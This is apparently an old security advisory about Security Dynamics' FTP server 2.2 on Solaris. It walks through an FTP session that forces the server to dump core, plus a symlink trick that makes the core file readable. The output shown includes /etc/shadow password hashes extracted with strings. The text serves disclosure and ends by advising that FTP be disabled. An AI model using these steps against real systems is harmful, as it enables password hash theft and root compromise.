COMMAND

    ftp

SYSTEMS AFFECTED

    Systems running Security Dynamics' FTP server (Version 2.2)

PROBLEM

    sp00n found  following.   This bug  is similar  to the solaris and
    other  ftp  core  dump  bugs,  slightly  diffrent  though. BTW the
    machine is a SPARC 20 running 2.5, You can link files and  clobber
    them with a core to annoy your local sys admin or, even better get
    /etc/shadow, etc.  Fot example:

    220 cornholio Security Dynamics' FTP server (Version 2.2) ready.
    Name (.:joeuser): joeuser
    331 Password required for mpotter.
    Password:
    230 User joeuser logged in.
    ftp> cd /tmp
    250 CWD command successful.
    ftp> user root DUMP_CORE_FTPD
    331 Password required for root.
    530 Login incorrect.
    Login failed.
    ftp> quote pasv
    421 Service not available, remote server has closed connection
    ftp> quit
    $ ls -la core
    -rw-r-----   1 root     network   264656 Nov 12 11:14 core

    At least it doesn't dump 666  like solaris's in.ftpd.  If you  got
    no read permission  for group, what  then?  Well  prior to dumping
    the core  you should  link it  to ps_data  or something  like that
    then you will get this:

    lrwxrwxrwx   1 joeuser  network        7 Nov 12 11:07 core -> ps_data
    -rw-rw-r--   1 root     sys       264656 Nov 12 11:07 ps_data

    $file ps_data
    ps_data:        ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd'

    $strings core | more

    noaccess:*LK*:6445::::::
    sp00n:o.IZGdC5eBTtKY:10175:7:28::::
    root:aiqzotPNtTsI:9988::::::
    user2:U6d5srjcJi/KU:9952::::::
    joeuser:ktxVoVPQVIgc.:10175:7:28::::
    root::0:root
    other::1:
    bin::2:root,daemon
    sys::3:root,bin,adm
    adm::4:root,daemon
    uucp::5:root

SOLUTION

    Disable ftp  since this  bug can  do alot.   Now, patch  should be
    released soon.  Till then is recommanded to switch to another  ftp
    client.